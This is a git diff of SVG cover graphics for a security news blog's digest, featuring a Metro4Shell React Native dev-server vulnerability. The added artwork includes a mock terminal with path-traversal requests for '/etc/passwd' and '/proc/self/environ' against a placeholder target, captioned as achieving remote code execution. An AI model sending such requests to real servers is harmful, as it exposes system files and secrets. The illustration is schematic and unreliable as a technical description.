20h1v1h-1zM15 20h4v1h-4zM20 20h6v1h-6zM27 20h1v1h-1zM30 20h1v1h-1zM32 20h2v1h-2zM36 20h7v1h-7zM44 20h1v1h-1zM0 21h1v1h-1zM4 21h1v1h-1zM8 21h2v1h-2zM13 21h3v1h-3zM17 21h1v1h-1zM19 21h2v1h-2zM24 21h1v1h-1zM26 21h1v1h-1zM29 21h2v1h-2zM32 21h2v1h-2zM35 21h2v1h-2zM40 21h3v1h-3zM0 22h2v1h-2zM4 22h1v1h-1zM6 22h1v1h-1zM8 22h2v1h-2zM11 22h5v1h-5zM17 22h1v1h-1zM20 22h1v1h-1zM22 22h1v1h-1zM24 22h1v1h-1zM26 22h2v1h-2zM29 22h2v1h-2zM32 22h2v1h-2zM36 22h1v1h-1zM38 22h1v1h-1zM40 22h2v1h-2zM43 22h1v1h-1zM0 23h2v1h-2zM4 23h1v1h-1zM8 23h1v1h-1zM11 23h2v1h-2zM14 23h1v1h-1zM19 23h2v1h-2zM24 23h2v1h-2zM30 23h1v1h-1zM34 23h3v1h-3zM40 23h1v1h-1zM43 23h2v1h-2zM1 24h2v1h-2zM4 24h6v1h-6zM12 24h3v1h-3zM16 24h1v1h-1zM18 24h7v1h-7zM27 24h1v1h-1zM29 24h1v1h-1zM32 24h2v1h-2zM35 24h7v1h-7zM43 24h2v1h-2zM0 25h1v1h-1zM2 25h1v1h-1zM5 25h1v1h-1zM9 25h3v1h-3zM13 25h2v1h-2zM17 25h2v1h-2zM20 25h1v1h-1zM22 25h3v1h-3zM26 25h1v1h-1zM29 25h2v1h-2zM32 25h2v1h-2zM36 25h3v1h-3zM42 25h2v1h-2zM0 26h4v1h-4zM6 26h1v1h-1zM14 26h2v1h-2zM17 26h1v1h-1zM20 26h2v1h-2zM23 26h2v1h-2zM26 26h1v1h-1zM28 26h1v1h-1zM30 26h1v1h-1zM33 26h1v1h-1zM35 26h1v1h-1zM37 26h1v1h-1zM39 26h1v1h-1zM42 26h2v1h-2zM1 27h2v1h-2zM4 27h1v1h-1zM7 27h1v1h-1zM9 27h3v1h-3zM13 27h3v1h-3zM17 27h2v1h-2zM20 27h1v1h-1zM22 27h2v1h-2zM25 27h1v1h-1zM31 27h4v1h-4zM36 27h2v1h-2zM39 27h3v1h-3zM3 28h2v1h-2zM6 28h2v1h-2zM11 28h2v1h-2zM15 28h1v1h-1zM18 28h1v1h-1zM20 28h2v1h-2zM26 28h2v1h-2zM31 28h2v1h-2zM34 28h1v1h-1zM37 28h1v1h-1zM39 28h2v1h-2zM44 28h1v1h-1zM1 29h1v1h-1zM4 29h1v1h-1zM7 29h1v1h-1zM9 29h2v1h-2zM14 29h1v1h-1zM16 29h4v1h-4zM21 29h3v1h-3zM26 29h1v1h-1zM28 29h5v1h-5zM35 29h1v1h-1zM37 29h1v1h-1zM39 29h1v1h-1zM41 29h1v1h-1zM44 29h1v1h-1zM0 30h1v1h-1zM2 30h1v1h-1zM4 30h1v1h-1zM6 30h3v1h-3zM13 30h1v1h-1zM15 30h1v1h-1zM18 30h2v1h-2zM21 30h4v1h-4zM26 30h5v1h-5zM33 30h1v1h-1zM35 30h1v1h-1zM39 30h3v1h-3zM43 30h1v1h-1zM1 31h2v1h-2zM4 31h1v1h-1zM8 31h1v1h-1zM10 31h1v1h-1zM12 31h1v1h-1zM14 31h1v1h-1zM16 31h1v1h-1zM19 31h3v1h-3zM23 31h1v1h-1zM25 31h3v1h-3zM32 31h1v1h-1zM34 31h1v1h-1zM38 31h3v1h-3zM43 31h1v1h-1zM0 32h1v1h-1zM2 32h1v1h-1zM6 32h1v1h-1zM8 32h1v1h-1zM14 32h2v1h-2zM17 32h1v1h-1zM21 32h1v1h-1zM24 32h4v1h-4zM29 32h1v1h-1zM31 32h2v1h-2zM36 32h4v1h-4zM41 32h1v1h-1zM43 32h1v1h-1zM0 33h1v1h-1zM2 33h3v1h-3zM11 33h2v1h-2zM14 33h1v1h-1zM19 33h1v1h-1zM22 33h3v1h-3zM26 33h2v1h-2zM29 33h5v1h-5zM35 33h1v1h-1zM37 33h1v1h-1zM39 33h1v1h-1zM41 33h3v1h-3zM4 34h1v1h-1zM6 34h4v1h-4zM11 34h1v1h-1zM13 34h1v1h-1zM15 34h1v1h-1zM17 34h2v1h-2zM20 34h3v1h-3zM25 34h1v1h-1zM28 34h3v1h-3zM32 34h1v1h-1zM34 34h2v1h-2zM40 34h1v1h-1zM42 34h2v1h-2zM1 35h4v1h-4zM8 35h1v1h-1zM15 35h2v1h-2zM19 35h2v1h-2zM22 35h1v1h-1zM25 35h1v1h-1zM27 35h1v1h-1zM32 35h1v1h-1zM37 35h4v1h-4zM43 35h1v1h-1zM0 36h1v1h-1zM3 36h2v1h-2zM6 36h1v1h-1zM9 36h1v1h-1zM11 36h1v1h-1zM13 36h4v1h-4zM18 36h1v1h-1zM20 36h5v1h-5zM26 36h2v1h-2zM29 36h2v1h-2zM32 36h1v1h-1zM34 36h1v1h-1zM36 36h5v1h-5zM42 36h1v1h-1zM44 36h1v1h-1zM8 37h1v1h-1zM10 37h2v1h-2zM14 37h1v1h-1zM17 37h1v1h-1zM20 37h1v1h-1zM24 37h1v1h-1zM26 37h8v1h-8zM35 37h2v1h-2zM40 37h3v1h-3zM0 38h7v1h-7zM8 38h2v1h-2zM11 38h1v1h-1zM14 38h2v1h-2zM18 38h3v1h-3zM22 38h1v1h-1zM24 38h8v1h-8zM36 38h1v1h-1zM38 38h1v1h-1zM40 38h2v1h-2zM43 38h1v1h-1zM0 39h1v1h-1zM6 39h1v1h-1zM9 39h1v1h-1zM11 39h3v1h-3zM15 39h6v1h-6zM24 39h4v1h-4zM29 39h1v1h-1zM33 39h2v1h-2zM36 39h1v1h-1zM40 39h1v1h-1zM43 39h2v1h-2zM0 40h1v1h-1zM2 40h3v1h-3zM6 40h1v1h-1zM8 40h4v1h-4zM13 40h1v1h-1zM16 40h2v1h-2zM19 40h6v1h-6zM27 40h1v1h-1zM30 40h1v1h-1zM32 40h10v1h-10zM0 41h1v1h-1zM2 41h3v1h-3zM6 41h1v1h-1zM9 41h4v1h-4zM14 41h2v1h-2zM19 41h2v1h-2zM23 41h1v1h-1zM26 41h5v1h-5zM33 41h1v1h-1zM36 41h2v1h-2zM39 41h1v1h-1zM41 41h1v1h-1zM0 42h1v1h-1zM2 42h3v1h-3zM6 42h1v1h-1zM10 42h2v1h-2zM13 42h2v1h-2zM18 42h2v1h-2zM22 42h1v1h-1zM24 42h1v1h-1zM26 42h1v1h-1zM29 42h5v1h-5zM37 42h1v1h-1zM40 42h1v1h-1zM42 42h2v1h-2zM0 43h1v1h-1zM6 43h1v1h-1zM15 43h2v1h-2zM18 43h1v1h-1zM20 43h1v1h-1zM24 43h1v1h-1zM30 43h3v1h-3zM36 43h2v1h-2zM40 43h2v1h-2zM0 44h7v1h-7zM8 44h1v1h-1zM11 44h1v1h-1zM13 44h5v1h-5zM20 44h5v1h-5zM27 44h1v1h-1zM29 44h1v1h-1zM31 44h5v1h-5zM37 44h1v1h-1zM40 44h2v1h-2zM44 44h1v1h-1z"/>
   </g>
-
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
-  </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 01, 2026</text>
-
-  <!-- Card 1: AI AGENT -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#ef4444" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#ef4444" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#ef4444" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#ef4444" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#ef4444" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#ef4444" stroke-width="1.2" opacity="0.5"/>
-  </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">AI AGENT</text>
-  <!-- Card 2: SEC OPS -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <!-- Card 3: THREAT INT -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">THREAT INT</text>
-  <!-- Card 4: CLOUD SEC -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#22c55e" stroke-width="1.8" transform="scale(0.65)"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 5: PATCH MGT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">CVE</text>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
-
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
-  </g>
-  <!-- Node: AI AGENT -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">AI</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">THRE</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">CLOU</text>
-  <!-- Node: PATCH MGT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">PATC</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
-
-  <!-- Tags -->
-  <rect x="32" y="490" width="92" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="78" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">AI AGENT</text>
-  <rect x="136" y="490" width="83" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="177" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <rect x="231" y="490" width="110" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="286" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">THREAT INT</text>
-  <rect x="353" y="490" width="101" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="403" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">CLOUD SEC</text>
-  <rect x="466" y="490" width="101" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="516" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
-
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 01, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-04-Tech_Security_Weekly_Digest_AI_Docker_Data_Go.svg
+++ b/assets/images/2026-02-04-Tech_Security_Weekly_Digest_AI_Docker_Data_Go.svg
@@ -1,134 +1,282 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 04, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Security digest cover: Metro4Shell RCE CVE-2025-11953, AWS IAM multi-region, AI Agent 3Cs Docker framework">
+<!-- profile: high-quality-cover (L20 Hero+2-Card, research-based, batch1-locked) -->
+<title>Metro4Shell RCE, AWS IAM Identity Center, AI Agent 3Cs Security Framework - 2026.02.04</title>
+<defs>
+  <linearGradient id="bgMain" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#080E1C"/>
+    <stop offset="50%" stop-color="#0B1220"/>
+    <stop offset="100%" stop-color="#101828"/>
+  </linearGradient>
+  <linearGradient id="heroGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#130A14"/>
+    <stop offset="100%" stop-color="#1A0B10"/>
+  </linearGradient>
+  <linearGradient id="topRightGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#090F1D"/>
+    <stop offset="100%" stop-color="#0D1520"/>
+  </linearGradient>
+  <linearGradient id="botRightGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#080F15"/>
+    <stop offset="100%" stop-color="#0A1418"/>
+  </linearGradient>
+  <radialGradient id="criticalGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="awsGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FF9900" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#FF9900" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="dockerGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#0DB7ED" stop-opacity="0.4"/>
+    <stop offset="100%" stop-color="#0DB7ED" stop-opacity="0"/>
+  </radialGradient>
+  <linearGradient id="kpiHero" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.25"/>
+    <stop offset="100%" stop-color="#C1121F" stop-opacity="0.12"/>
+  </linearGradient>
+  <linearGradient id="kpiAws" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#FF9900" stop-opacity="0.25"/>
+    <stop offset="100%" stop-color="#E08000" stop-opacity="0.12"/>
+  </linearGradient>
+  <linearGradient id="kpiDocker" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#0DB7ED" stop-opacity="0.25"/>
+    <stop offset="100%" stop-color="#0A90C0" stop-opacity="0.12"/>
+  </linearGradient>
+  <linearGradient id="codeBlock" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#1A0B10"/>
+    <stop offset="100%" stop-color="#0F0508"/>
+  </linearGradient>
+  <pattern id="dotGrid" x="0" y="0" width="32" height="32" patternUnits="userSpaceOnUse">
+    <circle cx="16" cy="16" r="0.6" fill="#FFFFFF" opacity="0.07"/>
+  </pattern>
+  <filter id="shadow" x="-5%" y="-5%" width="115%" height="120%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="4"/>
+    <feOffset dx="0" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.5"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+<filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%"><feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/><feOffset dx="1" dy="3"/><feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer><feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge></filter></defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<!-- CANVAS BACKGROUND -->
+<rect width="1200" height="630" fill="url(#bgMain)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- HEADER BAR -->
+<rect x="0" y="0" width="1200" height="72" fill="#0A0F1A"/>
+<rect x="0" y="68" width="1200" height="2" fill="#E63946" opacity="0.6"/>
+<text x="32" y="44" font-family="'Courier New',Courier,monospace" font-size="11" fill="#E63946" opacity="0.9" letter-spacing="3">TECH SECURITY WEEKLY DIGEST</text>
+<text x="1168" y="44" font-family="'Courier New',Courier,monospace" font-size="11" fill="#8899AA" text-anchor="end" letter-spacing="2">2026.02.04</text>
+<rect x="400" y="22" width="400" height="26" rx="4" fill="#E63946" opacity="0.12"/>
+<rect x="400" y="22" width="2" height="26" fill="#E63946"/>
+<text x="412" y="39" font-family="'Arial',sans-serif" font-size="11" fill="#E63946" font-weight="700" letter-spacing="2">CRITICAL CVE  |  ACTIVE EXPLOITATION</text>
+
+<!-- HERO PANEL: Metro4Shell / CVE-2025-11953 (600x510 at 32,80) -->
+<rect x="32" y="80" width="600" height="510" rx="10" fill="url(#heroGrad)"/>
+<rect x="32" y="80" width="600" height="510" rx="10" fill="#1C0A0E" opacity="0.55"/>
+<rect x="32" y="80" width="600" height="5" fill="#E63946"/>
+<rect x="32" y="80" width="600" height="510" rx="10" fill="none" stroke="#E63946" stroke-width="0.8" stroke-opacity="0.35"/>
+
+<!-- Ambient glow hero -->
+<ellipse cx="332" cy="300" rx="260" ry="200" fill="url(#criticalGlow)" opacity="0.55">
+  <animate attributeName="opacity" values="0.4;0.75;0.4" dur="5.5s" repeatCount="indefinite"/>
+  <animate attributeName="rx" values="260;285;260" dur="7.2s" repeatCount="indefinite"/>
+</ellipse>
+
+<!-- Hero eyebrow -->
+<text x="56" y="118" font-family="'Courier New',Courier,monospace" font-size="10" fill="#E63946" letter-spacing="3" opacity="0.95">P0 CRITICAL  |  ACTIVE EXPLOIT</text>
+
+<!-- Hero title -->
+<text x="56" y="158" font-family="'Arial Black','Arial',sans-serif" font-size="34" fill="#FFFFFF" font-weight="900" letter-spacing="-0.5">Metro4Shell</text>
+<text x="56" y="193" font-family="'Arial Black','Arial',sans-serif" font-size="22" fill="#E63946" font-weight="800">CVE-2025-11953</text>
+
+<!-- Hero subtitle -->
+<text x="56" y="222" font-family="'Arial',sans-serif" font-size="13" fill="#AABBCC">React Native CLI Metro Dev Server RCE</text>
+
+<!-- Divider -->
+<line x1="56" y1="234" x2="600" y2="234" stroke="#E63946" stroke-width="0.5" opacity="0.3"/>
+
+<!-- Terminal illustration -->
+<rect x="56" y="244" width="550" height="152" rx="6" fill="url(#codeBlock)" stroke="#E63946" stroke-width="0.6" stroke-opacity="0.4"/>
+<rect x="56" y="244" width="550" height="22" rx="6" fill="#2A0810"/>
+<rect x="56" y="258" width="550" height="8" fill="#2A0810"/>
+<circle cx="74" cy="255" r="5" fill="#E63946" opacity="0.8"/>
+<circle cx="90" cy="255" r="5" fill="#FFB703" opacity="0.6"/>
+<circle cx="106" cy="255" r="5" fill="#2DC653" opacity="0.6"/>
+<text x="280" y="259" font-family="'Courier New',Courier,monospace" font-size="9" fill="#8899AA" text-anchor="middle">Metro Dev Server -- Port 8081</text>
+
+<text x="70" y="284" font-family="'Courier New',Courier,monospace" font-size="10" fill="#8899AA">$</text>
+<text x="82" y="284" font-family="'Courier New',Courier,monospace" font-size="10" fill="#FF6B6B">curl http://TARGET:8081/../../../etc/passwd</text>
+<text x="70" y="300" font-family="'Courier New',Courier,monospace" font-size="10" fill="#8899AA">$</text>
+<text x="82" y="300" font-family="'Courier New',Courier,monospace" font-size="10" fill="#FFB703">GET /debugger-ui/../../proc/self/environ</text>
+<line x1="56" y1="311" x2="606" y2="311" stroke="#E63946" stroke-width="0.4" opacity="0.2"/>
+<text x="70" y="326" font-family="'Courier New',Courier,monospace" font-size="10" fill="#4ADE80">[!] PATH TRAVERSAL via Metro bundler route</text>
+<text x="70" y="342" font-family="'Courier New',Courier,monospace" font-size="10" fill="#4ADE80">[!] RCE achieved -- unauthenticated attacker</text>
+<text x="70" y="358" font-family="'Courier New',Courier,monospace" font-size="10" fill="#8899AA"># EPSS 42% -- active exploitation confirmed</text>
+<text x="70" y="374" font-family="'Courier New',Courier,monospace" font-size="10" fill="#8899AA"># Pkg: @react-native-community/cli</text>
+<rect x="70" y="381" width="7" height="10" fill="#E63946" opacity="0.9">
+  <animate attributeName="opacity" values="0.9;0;0.9" dur="1.1s" repeatCount="indefinite"/>
+</rect>
+
+<!-- Attack flow label -->
+<text x="56" y="416" font-family="'Arial',sans-serif" font-size="10" fill="#8899AA" letter-spacing="2">ATTACK VECTOR</text>
+<line x1="56" y1="420" x2="600" y2="420" stroke="#8899AA" stroke-width="0.3" opacity="0.3"/>
+
+<!-- Flow nodes -->
+<rect x="60" y="430" width="88" height="36" rx="6" fill="#E63946" opacity="0.18" stroke="#E63946" stroke-width="0.8"/>
+<text x="104" y="449" font-family="'Arial',sans-serif" font-size="9" fill="#E63946" text-anchor="middle" font-weight="700">ATTACKER</text>
+<text x="104" y="462" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">No Auth</text>
+<line x1="150" y1="448" x2="196" y2="448" stroke="#E63946" stroke-width="1.2" opacity="0.7"/>
+<polygon points="196,444 204,448 196,452" fill="#E63946" opacity="0.7"/>
+
+<rect x="206" y="430" width="96" height="36" rx="6" fill="#FFB703" opacity="0.15" stroke="#FFB703" stroke-width="0.8"/>
+<text x="254" y="449" font-family="'Arial',sans-serif" font-size="9" fill="#FFB703" text-anchor="middle" font-weight="700">METRO :8081</text>
+<text x="254" y="462" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">Dev Server</text>
+<line x1="304" y1="448" x2="348" y2="448" stroke="#E63946" stroke-width="1.2" opacity="0.7"/>
+<polygon points="348,444 356,448 348,452" fill="#E63946" opacity="0.7"/>
+
+<rect x="358" y="430" width="96" height="36" rx="6" fill="#E63946" opacity="0.18" stroke="#E63946" stroke-width="0.8"/>
+<text x="406" y="449" font-family="'Arial',sans-serif" font-size="9" fill="#E63946" text-anchor="middle" font-weight="700">PATH TRAV.</text>
+<text x="406" y="462" font-family="'Arial',sans-serif" font-size="8" fill="#8899AA" text-anchor="middle">../../../ bypass</text>
+<line x1="456" y1="448" x2="498" y2="448" stroke="#E63946" stroke-width="1.2" opacity="0.7"/>
+<polygon points="498,444 506,448 498,452" fill="#E63946" opacity="0.7"/>
+
+<rect x="508" y="430" width="72" height="36" rx="6" fill="#E63946" opacity="0.3" stroke="#E63946" stroke-width="1.2"/>
+<text x="544" y="449" font-family="'Arial',sans-serif" font-size="9" fill="#FFFFFF" text-anchor="middle" font-weight="700">RCE</text>
+<text x="544" y="462" font-family="'Arial',sans-serif" font-size="8" fill="#FFAAB0" text-anchor="middle">Arb. Code</text>
+
+<!-- KPI card hero -->
+<rect x="56" y="480" width="552" height="86" rx="6" fill="url(#kpiHero)"/>
+<rect x="56" y="480" width="3" height="86" rx="1" fill="#E63946"/>
+
+<text x="90" y="502" font-family="'Arial',sans-serif" font-size="10" fill="#8899AA" letter-spacing="1">CVSS</text>
+<text x="90" y="528" font-family="'Arial Black','Arial',sans-serif" font-size="28" fill="#E63946" font-weight="900">9.8</text>
+<text x="90" y="548" font-family="'Arial',sans-serif" font-size="9" fill="#FF6B6B">CRITICAL</text>
+<line x1="188" y1="490" x2="188" y2="558" stroke="#E63946" stroke-width="0.4" opacity="0.3"/>
+
+<text x="202" y="502" font-family="'Arial',sans-serif" font-size="10" fill="#8899AA" letter-spacing="1">EPSS 30d</text>
+<text x="202" y="528" font-family="'Arial Black','Arial',sans-serif" font-size="28" fill="#FFB703" font-weight="900">42%</text>
